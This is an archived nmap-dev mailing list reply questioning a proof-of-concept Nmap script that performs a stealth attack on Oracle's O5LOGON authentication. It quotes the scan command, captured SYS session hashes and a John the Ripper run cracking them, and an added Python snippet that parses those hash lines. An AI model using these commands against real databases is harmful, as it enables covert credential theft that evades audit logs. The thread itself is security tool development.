Nmap Development mailing list archives
Re: Script suggestion - oracle
From: Richard Miles <richard.k.miles () googlemail com>
Date: Wed, 10 Oct 2012 09:44:36 -0500
Hi Dhiru,

Very nice work.

> I have written a NSE script for doing a stealth attack against the O5LOGON protocol. This allows us to brute-force the session key(s) offline.
>
> I have verified that using this script generates no alerts or logs on the Oracle server.

It's really dangerous. Default configuration? Audit was enabled?

> Result of "select os_username, username, userhost, action_name, returncode from dba_audit_session where action_name = 'LOGON' and username = 'SYS' and returncode > 0 order by timestamp;" query is constant when this script is used.

I'm not sure if I understood. Do you believe that this query is generated because of each attempt that your script executes? How did you notice it? Was it logged somewhere?

> ✗ cat ~/passdb
> wrongpassword
> ✗ ./nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL,userdb=/home/user/userdb,passdb=/home/user/passdb 192.168.2.253 --datadir .

Why do you need to set up a passdb if you should never complete the authentication? My understanding based on your explanation is that you will get the data that you need before sending the password, right?

> Starting Nmap 6.02 ( http://nmap.org ) at 2012-10-06 13:03 IST
> sys:$o5logon$E72DE5DA9067B874D759B3FDAA5FE5D64FA290E397026DF60A5B9BBD02A753CC39084572351F269886BE5EC746D9ECFC*5B624C20405D6C0FCCC3
> sys:$o5logon$93DE103E471448653275625487FA6DEADD1BE91F199D4CAA1780658E1B3606FE1F9B57BA8A0CA9E451629A039ABB1DE2*5B624C20405D6C0FCCC3
> Nmap scan report for 192.168.2.253
> Host is up (0.00033s latency).
> PORT     STATE SERVICE
> 1521/tcp open  oracle
> | oracle-brute-stealth:
> |   Accounts
> |     No valid accounts found
> |   Statistics
> |_    Performed 2 guesses in 1 seconds, average tps: 2
>
> Nmap done: 1 IP address (1 host up) scanned in 0.48 seconds

Why is the same account (SYS) printed two times on the output? Do you have two users called SYS in your userdb file? Also, why does the script say that no valid account was found if you obtained two hashes?

Thanks for your great work.

> ➜  src git:(unstable-jumbo) ✗ cat ~/hashes
> sys:$o5logon$E72DE5DA9067B874D759B3FDAA5FE5D64FA290E397026DF60A5B9BBD02A753CC39084572351F269886BE5EC746D9ECFC*5B624C20405D6C0FCCC3
> sys:$o5logon$93DE103E471448653275625487FA6DEADD1BE91F199D4CAA1780658E1B3606FE1F9B57BA8A0CA9E451629A039ABB1DE2*5B624C20405D6C0FCCC3
> ➜  src git:(unstable-jumbo) ✗ ../run/john ~/hashes
> Loaded 2 password hashes with 2 different salts (Oracle O5LOGON protocol [32/64])
> password         (sys)
> password         (sys)
> guesses: 2  time: 0:00:00:00 DONE (Sat Oct  6 13:04:44 2012)  c/s: 3772  trying: password
> Use the "--show" option to display all of the cracked passwords reliably
>
> JtR has guessed the correct password although the nmap script tried to log in with an incorrect password (wrongpassword)!
>
> This script is just a PoC. It needs tons of work before it can go in. Can a Nmap developer fix and commit it?
>
> --
> Cheers,
> Dhiru
_______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
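Added illustration, not part of the thread and not code from the Nmap or John the Ripper projects: a small parser for the `user:$o5logon$<hex>*<hex>` lines the PoC printed. It validates the field widths visible in the output (96 hex digits for the server's encrypted session key, 20 for the per-user salt; the names AUTH_SESSKEY and AUTH_VFR_DATA are taken from the O5LOGON exchange and are an assumption here), then groups captures per account, which answers the "printed twice" question from the data alone: two connections for the same user, two different server session keys, one salt. The sample input is the page's own output, embedded as a constant.

```python
import re
from collections import defaultdict

# Constructed sample: the two lines the oracle-brute-stealth PoC printed on the page.
SAMPLE_OUTPUT = """\
Starting Nmap 6.02 ( http://nmap.org ) at 2012-10-06 13:03 IST
sys:$o5logon$E72DE5DA9067B874D759B3FDAA5FE5D64FA290E397026DF60A5B9BBD02A753CC39084572351F269886BE5EC746D9ECFC*5B624C20405D6C0FCCC3
sys:$o5logon$93DE103E471448653275625487FA6DEADD1BE91F199D4CAA1780658E1B3606FE1F9B57BA8A0CA9E451629A039ABB1DE2*5B624C20405D6C0FCCC3
Nmap scan report for 192.168.2.253
"""

# One whole line: <user>:$o5logon$<sesskey hex>*<salt hex>
O5LOGON_RE = re.compile(
    r"^(?P<user>[^:\s]+):\$o5logon\$(?P<sesskey>[0-9A-Fa-f]+)\*(?P<salt>[0-9A-Fa-f]+)$"
)

# Field widths seen on the page: 48-byte AUTH_SESSKEY (assumed name) and
# 10-byte AUTH_VFR_DATA salt (assumed name); anything else is a garbled capture.
SESSKEY_HEX_LEN = 96
SALT_HEX_LEN = 20


def parse_o5logon_lines(text):
    """Return a list of {'user', 'sesskey', 'salt'} dicts for well-formed lines; skip the rest."""
    records = []
    for line in text.splitlines():
        m = O5LOGON_RE.match(line.strip())
        if not m:
            continue
        sesskey, salt = m["sesskey"], m["salt"]
        if len(sesskey) != SESSKEY_HEX_LEN or len(salt) != SALT_HEX_LEN:
            continue  # truncated or garbled line, do not trust it
        records.append({"user": m["user"].lower(),
                        "sesskey": bytes.fromhex(sesskey),
                        "salt": bytes.fromhex(salt)})
    return records


def summarize(records):
    """Per account: number of captures, distinct session keys, distinct salts."""
    by_user = defaultdict(lambda: {"captures": 0, "sesskeys": set(), "salts": set()})
    for r in records:
        e = by_user[r["user"]]
        e["captures"] += 1
        e["sesskeys"].add(r["sesskey"])
        e["salts"].add(r["salt"])
    return {u: {"captures": e["captures"],
                "distinct_sesskeys": len(e["sesskeys"]),
                "distinct_salts": len(e["salts"])} for u, e in by_user.items()}


if __name__ == "__main__":
    print(summarize(parse_o5logon_lines(SAMPLE_OUTPUT)))
```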